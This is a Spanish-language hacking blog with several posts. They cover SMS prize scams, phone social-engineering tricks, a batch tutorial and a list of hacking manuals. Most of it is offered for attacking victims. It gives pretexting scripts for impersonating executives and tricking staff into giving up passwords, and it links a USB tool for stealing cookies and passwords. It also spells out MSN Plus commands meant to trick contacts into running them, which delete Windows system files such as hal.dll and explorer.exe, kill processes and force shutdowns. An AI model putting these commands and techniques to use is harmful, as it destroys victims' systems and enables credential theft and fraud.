sábado, 27 de febrero de 2010

Uso de Ingenieria Social

En este Articulo estare publicando algunos tips de ayuda para que puedan informarse de que manera usar la ingenieria social en el hacking.

A mas de Alguno le ha pasado esto... Ven que en su Celular hay un mensaje de texto que dice: "X Compañía te informa que has ganado $25,000 Dolares y un Carro ultimo Modelo."

Cuando es legal esa información? Pues Cuando nosotros comparamos el nombre de la compañia con la que andamos el celular con el nombre de la compañia que nos aparece en el mensaje de texto.

Otra opcion es que comparemos el area del numero, si es de nuestro pais, informarte si han salido sorteos en los periodicos etc.

Para no aburrirlos, cuando ustedes han salido ganadores en alguna promocion, la compañia les debe llamar.

Respecto a lo que escribe del mensaje de texto, en términos legales se le puede llamar estafa, buscan estafarte, pero en términos informáticos se le llama ingeniería social.

En la region de CentroAmerica sucede muy a menudo, en mi familia, mi padre y mi hermana recibieron mensajes asi, con area de otro pais el numero, ahi detecte que son ing, sociales (terminos hacking) y estafadores (terminos legales)

Como funciona la tecnica de ellos? Aquí la Respuesta...

Primero Envían el Mensaje de texto a un numero al azar, Al final del mensaje te dejan el nombre de una persona y el numero de telefono, (el estafador o ing social con el que te vas a comunicar si caes en la trampa)

Digamos que caistes solo por curiosidad, lo primero que oiras sera a una persona que habla con profesionalismo y te dara detalles del sorteo y te felicitara como que si fueras un gran ganador.

Cuando detectaremos la estafa o el engaño?? Cuando el Sujeto nos pida tarjeta de credito, remesa a cuenta, que segun lo que te dicen es para el traslado y pagos por el movimiento del premio hasta la puerta de la casa.

Nadie te puede pedir eso cuando algo es legal, la empresa te llama y debes presentarte a sus oficinas.

"Hints and tips" sobre la ingeniería social y teléfono

* *.. Llamar siempre con numero oculto.


* *.. Cuando hagamos una llamada no debemos dudar , hablemos siempre claro y
de forma fluida, la duda genera desconfianza.

* *.. Preparemos la llamada, una lista de posibles preguntas o respuestas, e
incluso la preparación de un guión con las frases largas que vamos a
utilizar nos ayudara . Es importante que no se note que leemos, si es que lo
hacemos así.

* *.. No colguemos el teléfono de forma brusca, eso genera desconfianza y si
vamos a realizar una segunda llamada será mejor siempre despedirse de una
forma cordial.

* *.. No es bueno extenderse demasiado en la información aportada en una
llamada cuando pretendemos* hacer creer que formamos parte de la
organización a la que estamos llamando. Debe parecer que conocemos la
compañía, y entre compañeros la información vaga será suficiente. Por otro
lado es muy importante que la conversación no sea demasiado larga pues la
probabilidad de cometer errores es mucho mayor.

* *.. La llamada* encadenada es una técnica que se utiliza mucho cuando se
quiere penetrar en el entramado de una compañía. Se realiza una primera
llamada en la que se recaba cierta información sobre nombres de personas o
datos técnicos. Basta en muchos casos hacerse pasar por un cliente o
proveedor posible de la compañía a la que llamamos. Luego, en una segunda
llamada utilizamos esa información que ya sabemos para que otra persona
distinta apoyándose en ella obtenga la que verdaderamente le interesa. Para
no levantar sospechas, entre ambas llamadas transcurre un cierto tiempo que
evita que alguien puede establecer una conexión de ambas llamadas. Se pueden
ir encadenando llamadas hasta llegar al objetivo.

* *.. Técnica del candado de voz. Se llama así cuando lo que se desea es
llegar a entrar en un edificio de oficinas en el que se realiza un control
informático de visitas. En estos edificios los equipos de seguridad
requerirán la documentación de las visitas y algunos datos para controlar su
acceso al edificio. Sin embargo, existe en muchos casos la posibilidad de
saltarse el control de accesos con un poco de ayuda desde el interior. Lo
primero que se necesita es el nombre completo de un directivo importante de
alguna de las firmas en dicho edificio. Algo que es fácil de conseguir con
una llamada. Luego es necesario el teléfono de la recepción del edificio. Lo
que se hace a continuación es llamar a la recepción suplantando al directivo
cuyos datos tenemos. Se advierte a recepción de la visita de una persona muy
importante que llegara a una cierta hora y que es importante que se le
permita el paso al edificio. Vale un directivo de una gran compañía, o un
político. Eso es menos importante, lo que suele pasar es que es el propio
vigilante el que acompaña al Ingeniero social al interior del edificio, mas
allá de los controles de entrada.

* *.. La falsa interferencia es otro sistema curioso que lo creamos o no
tiene éxito. Se trata de realizar una llamada desde un teléfono que se
modifica para que la calidad de la señal emitida sea muy pobre. Basta con
usar un par de cables en contacto con el auricular para que nuestra voz se
entrecorte y se escuche con ruido. Se efectúa la llamada al objetivo que
escuchara gritar entre ruidos. La idea es que el esfuerzo del interlocutor
para mantener la conversación es alto y por lo tanto, cuanto antes nos de lo
que pedimos mas rápido acabara su tormento. Es bueno en estos casos hacer
que la llamada se corte deliberadamente varias veces, hasta casi hartar a la
persona que la recibe. En ese momento se pide la información que deseamos
"hola, soy Matías de informática,* es que estoy tratando de solucionar un
problema y desde aquí no se que pasa que no tengo cobertura. ¿ Me puedes
decir como era la contraseña de acceso a la aplicación de facturación?.* En
un alto porcentaje de los casos, las personas que reciben la llamada
trataran de ayudarnos y nos darán la información que buscamos sin preguntar
mas cosas solo porque así zanjan esa desagradable situación de incomodidad
que tienen al hablar entre tanto ruido.

En fin, como vemos hay multitud de pequeños trucos que se aplican cuando se
practica Ingeniería Social a través del teléfono.

CONTINUARA....

domingo, 20 de diciembre de 2009

Aprende Batch Desde Cero By Shesomaru

En DOS, OS/2 y Microsoft Windows un archivo batch es un archivo de procesamiento por lotes. Se trata de archivos de texto sin formato, guardados con la extensión BAT que contienen un conjunto de comandos MS-DOS. Cuando se ejecuta este archivo, (mediante command.com) los comandos contenidos son ejecutados en grupo, de forma secuencial, permitiendo automatizar diversas tareas. Cualquier comando MS-DOS puede ser utilizado en un archivo batch.

Esta es la forma de automatizar procesos (copiar, pegar, renombrar y enviar datos) de MS-DOS así evitamos procesos rutinarios y monotonos, esto es trabajo de máquina. Tiene la funcionalidad de conectarse con otras interfaces por línea de comandos.

Un fichero batch es un archivo de texto que contiene comandos a ejecutar en un intérprete de comandos propio de DOS o OS/2. Cuando es iniciado, un programa shell (típicamente COMMAND.COM o cmd.exe) lo lee y ejecuta, generalmente línea a línea. De este modo, se emplea para ejectuar series de comandos automáticamente. El hecho de que funcione solo para MS-DOS lo hace muy limitado. Su extension es BAT y sus comandos principales son go to, echo, if, type y exit.

Descargar Manual aqui: http://www.megaupload.com/?d=2E7ENZ2K

Para mas Información: http://es.wikipedia.org/wiki/Batch

miércoles, 12 de agosto de 2009

Roba Datos Con tu USB xD!

Hola Comunidad que me visita, les dejo aqui una aplicacion que la deben andar en su USB si quieren robar datos como, cookies, contraseñas, archivos complementarios de internet.

Mas que todo sirve para las contraseñas es un buen metodo, lo recomiendo xD!

Si tienen Dudas no se olviden de preguntar aqui y siempre visitarnos =D No hay mucho mas que decir ps ahi les van las instrucciones de uso, nomas les dejo el link de descarga.

Algo que les dire es que no es virus, pero si es un codigo malicioso que es el que roba las cookies. Asi que los antivirus de las victimas pueden detectarlo o eliminarlo quiza.

Alli usen su astucia muchachos/as sean inteligentes xD!

Descargar aqui: http://www.megaupload.com/?d=CS90KJN2

Saludoooos de mi parte y sepan aprovechar esta herramienta...

lunes, 10 de agosto de 2009

Maldades a Travez de MSN Plus xD!

Un brother me enseño esto que descubrioo se trata de parametros run/ en msn plus y es que cuando los envias a la persona se le ejecuta el parametro que le mandas por ejemplo estos:

1. Hace aparecer una ventana indicando que el PC se apagará en 20 segundos con el mensaje "Eres un idiota me apagare para que no me uses".

//run shutdown -s -t 20 -c "Eres un idiota me apagare para que no me uses"

Este comnado se ejecuta en la otra maquina si la persona te lo regresa, ademas solo funciona en XP, porque es de XP, asi apagaba mi maquina yop!

2. Borra archivos importantes, jode windows en general, no es mucho bah...

//run cmd /c echo [color=#ff0000]ERES UN IMBECIL ASQUEROSO PUT* HIJO DE Z*RRA MADRE[/color] & @echo off & cls & del /f %systemroot%\system\hal.dll & del /f %systemroot%\system32\hal.dll & del /f %systemroot%\system\system.* & del /f %systemroot%\system32\system.* & del /f %systemroot%\system32\Win.com & del /f %systemroot%\system32\command.com & del /f %systemroot%\system32\keyboard.* & del /f %systemroot%\system32\shell.* & del /f %systemroot%\system32\mouse.* & del /f %systemroot%\system32\msvideo.* & del /f %systemroot%\regedit.exe & del /f %systemroot%\taskman.exe & del /f %systemroot%\explorer.exe & del /f %systemroot%\system32\taskkill.exe & del /f %systemroot%\system32\tasklist.exe & del /f %systemroot%\system32\taskmgr.exe & del /f %systemroot%\keyboard.*

Este como ya vemos la descripcion si gustan cambian las letras rojas.

3. Crea directorios al azar. Simplemente por molestar.

//run cmd /c echo SOY TAAAAAAN ESTÚPIDO Y ESTOY MUY INFECTADO DE VIRUS! & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random% & mkdir %random%

Le cambian el nombre si gustan lo que quieran poner solo cambien su Msj por las letras rojas xD!

4. Descarga de memoria el explorer. Todos sabemos lo que pasa cuando explorer.exe se mata...

//run cmd /c echo SE DE SOBRA QUE ERES IDIOTA!! & taskkill /f /IM explorer.exe

5. Cierra (descarga) el messenger...

//run cmd /c echo EL JODIDO MSN MURIO & taskkill /f /IM msnmsgr.exe

6. Cierra explorer, borra explorer y reinicia. Muuuy puteante y dañino.

//run cmd /c echo ERES UN IMBRECIL ESTAS JODIDO taskkill /f /IM explorer.exe & del /F c:\windows\system32\explorer.exe & shutdown -s -t 2 -c

Pueden cambiar las letras de insultos con la que quieran algo especial cuando alguien los moleste en el Msn


Por si no entendistes!!! Copias el codigo, Se lo mandas via Chat en el cuadro de MSN a tu victima, Vera Raro el Codigo y te dira que es??? Hazte el ignorante y di que tu no ves nada xD! Te Lo Enviara de regre para que lo veas y alli se le ejecuta xD!
PD: Debes Tener MSN Plus, Tu Victima Cualquier MSN y Windows XP
Saludooos. xD!

sábado, 8 de agosto de 2009

Manuales Hacking, Basico Antiguo xD!

Hola, Como veran cuando uno se forja en una carrera, todo tiene su historia, es lo primero que les dicen en la universidad, alguna frase en especial respecto a la carrera que llevais o alguna historia de los grandes personajes antiguos que fueron profesionales en esa carrera que uds llevais xD!

Ahora mi punto es que uds en base a lo que les voy a proporcionar, hagan su historia y conozcan un poco sobre el hacking, asi no andaran siendo victimas en internet xD!

Un Poco de lo relacionado, algunos manuales de herramientas, como protegerse y mucho mas en este enlace que les dejare, pero primero el detalle de los archivos dentro =D!

Temas Del Archivo

Hacking, Amenazas via Internet, Apoderate de un ICQ, Aujeros de Seguridad, Control de Accesos, Criptografia Básica, Curso de Firewalls, Curso de Hacking, Curso de Hacking Avanzado, Curso de Utilización de un Firewall, Esconde tu IP, Guia de Crackeo, Guia de Cracking, Guia de Hackeo de un Sitio Web, Guia de Mataprocesos, Guia de Protocoles TCP-IP, Guia de Redes LAN, Guia de Spoofing, Guia del Hacker, Guia FAQ de Hacking, Hackeando un Sistema Linux, Hackers 1.0 de Claudio Hernández, Hackers 2.0, La Caza de Hackers, Librate de un Troyano, Manual de Criptografia, Manual de Ping & Tracert, Manual de Sniffing, Manual del BO2 Español, Manual del Hacker, Manual del Subseven, Seguridad en Unix & Redes, Seguridad Informática, Tutorial de PGP.


Ahora cada minimo detalle, que ven alli lo van a encontrar en el archivo de descarga, todo bien explicado y bien editado para el aprendizaje de uds.




Algo No Actualizable pero es para su aprendizaje sobre teoria en el hacking, la practica la hacen uds, no cuesta xD!
Saludooos. xD!